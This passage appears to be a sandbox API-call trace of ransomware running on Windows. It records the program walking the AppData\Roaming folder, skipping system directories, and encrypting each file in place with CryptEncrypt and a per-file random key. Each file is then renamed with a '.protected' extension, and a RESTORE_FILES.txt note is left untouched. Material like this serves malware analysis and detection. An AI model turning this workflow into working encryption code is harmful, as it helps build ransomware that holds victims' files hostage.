pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.715] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpkmqetwm.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrW (lpFirst="BpkMqeTWM.flv", lpSrch=".txt") returned 0x0 [0089.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrW (lpFirst="BpkMqeTWM.flv", lpSrch=".rar") returned 0x0 [0089.715] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv") returned 63 [0089.715] StrStrW (lpFirst="BpkMqeTWM.flv", lpSrch=".zip") returned 0x0 [0089.715] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.716] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.716] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.717] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.717] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.717] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.717] CloseHandle (hObject=0xd4) returned 1 [0089.721] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv.protected") returned 73 [0089.721] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpkmqetwm.flv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\BpkMqeTWM.flv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\bpkmqetwm.flv.protected")) returned 1 [0089.722] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="Windows") returned -1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="Program Files") returned -1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="Program Files (x86)") returned -1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="$Recycle.bin") returned 1 [0089.722] lstrcmpiW (lpString1="CeWKNCx_cc9C.odt", lpString2="System Volume Information") returned -1 [0089.722] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.722] StrStrIW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".protected") returned 0x0 [0089.722] lstrcmpW (lpString1="CeWKNCx_cc9C.odt", lpString2="RESTORE_FILES.txt") returned -1 [0089.722] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.722] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.722] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cewkncx_cc9c.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.723] StrStrW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".txt") returned 0x0 [0089.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.723] StrStrW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".rar") returned 0x0 [0089.723] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt") returned 66 [0089.723] StrStrW (lpFirst="CeWKNCx_cc9C.odt", lpSrch=".zip") returned 0x0 [0089.723] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.724] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.724] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.725] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.725] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.725] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.725] CloseHandle (hObject=0xd4) returned 1 [0089.726] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt.protected") returned 76 [0089.726] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cewkncx_cc9c.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\CeWKNCx_cc9C.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cewkncx_cc9c.odt.protected")) returned 1 [0089.728] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="Windows") returned -1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="Program Files") returned -1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="Program Files (x86)") returned -1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="$Recycle.bin") returned 1 [0089.728] lstrcmpiW (lpString1="cUju.odt", lpString2="System Volume Information") returned -1 [0089.728] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.728] StrStrIW (lpFirst="cUju.odt", lpSrch=".protected") returned 0x0 [0089.728] lstrcmpW (lpString1="cUju.odt", lpString2="RESTORE_FILES.txt") returned -1 [0089.729] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.729] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.729] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cuju.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.729] StrStrW (lpFirst="cUju.odt", lpSrch=".txt") returned 0x0 [0089.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.729] StrStrW (lpFirst="cUju.odt", lpSrch=".rar") returned 0x0 [0089.729] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt") returned 58 [0089.729] StrStrW (lpFirst="cUju.odt", lpSrch=".zip") returned 0x0 [0089.729] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.730] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.730] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.731] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.731] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.731] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.731] CloseHandle (hObject=0xd4) returned 1 [0089.732] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt.protected") returned 68 [0089.732] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cuju.odt"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\cUju.odt.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\cuju.odt.protected")) returned 1 [0089.732] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.732] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="Windows") returned -1 [0089.732] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="Program Files") returned -1 [0089.735] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="Program Files (x86)") returned -1 [0089.735] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="$Recycle.bin") returned 1 [0089.735] lstrcmpiW (lpString1="dp-nCk0VRWoB.swf", lpString2="System Volume Information") returned -1 [0089.735] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrIW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".protected") returned 0x0 [0089.735] lstrcmpW (lpString1="dp-nCk0VRWoB.swf", lpString2="RESTORE_FILES.txt") returned -1 [0089.735] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.735] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.735] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dp-nck0vrwob.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".txt") returned 0x0 [0089.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".rar") returned 0x0 [0089.735] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf") returned 66 [0089.735] StrStrW (lpFirst="dp-nCk0VRWoB.swf", lpSrch=".zip") returned 0x0 [0089.737] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.738] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.738] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.739] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.739] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.739] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.739] CloseHandle (hObject=0xd4) returned 1 [0089.740] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf.protected") returned 76 [0089.740] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dp-nck0vrwob.swf"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dp-nCk0VRWoB.swf.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dp-nck0vrwob.swf.protected")) returned 1 [0089.743] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="Windows") returned -1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="Program Files") returned -1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="Program Files (x86)") returned -1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="$Recycle.bin") returned 1 [0089.743] lstrcmpiW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="System Volume Information") returned -1 [0089.743] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.743] StrStrIW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".protected") returned 0x0 [0089.743] lstrcmpW (lpString1="EClnSzyYRcAQyubAB.wav", lpString2="RESTORE_FILES.txt") returned -1 [0089.743] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.743] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eclnszyyrcaqyubab.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.744] StrStrW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".txt") returned 0x0 [0089.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.744] StrStrW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".rar") returned 0x0 [0089.744] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav") returned 71 [0089.744] StrStrW (lpFirst="EClnSzyYRcAQyubAB.wav", lpSrch=".zip") returned 0x0 [0089.744] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.747] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.747] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.747] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.748] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.748] CloseHandle (hObject=0xd4) returned 1 [0089.749] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav.protected") returned 81 [0089.749] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eclnszyyrcaqyubab.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\EClnSzyYRcAQyubAB.wav.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eclnszyyrcaqyubab.wav.protected")) returned 1 [0089.750] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="Windows") returned -1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="Program Files") returned -1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="Program Files (x86)") returned -1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="$Recycle.bin") returned 1 [0089.750] lstrcmpiW (lpString1="etwJJ2ULJq.m4a", lpString2="System Volume Information") returned -1 [0089.750] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.750] StrStrIW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".protected") returned 0x0 [0089.750] lstrcmpW (lpString1="etwJJ2ULJq.m4a", lpString2="RESTORE_FILES.txt") returned -1 [0089.750] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0089.750] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0089.750] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\etwjj2uljq.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0089.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.751] StrStrW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".txt") returned 0x0 [0089.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.751] StrStrW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".rar") returned 0x0 [0089.751] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a") returned 64 [0089.751] StrStrW (lpFirst="etwJJ2ULJq.m4a", lpSrch=".zip") returned 0x0 [0089.751] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.752] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.752] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0089.752] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.753] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0089.753] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0089.753] CloseHandle (hObject=0xd4) returned 1 [0089.753] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a.protected") returned 74 [0089.753] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\etwjj2uljq.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\etwJJ2ULJq.m4a.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\etwjj2uljq.m4a.protected")) returned 1 [0089.754] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 1 [0089.754] lstrcmpiW (lpString1="iczqBiWGVNp4VQ8_u7f.odp", lpString2="Windows") returned -1 [0089.754] 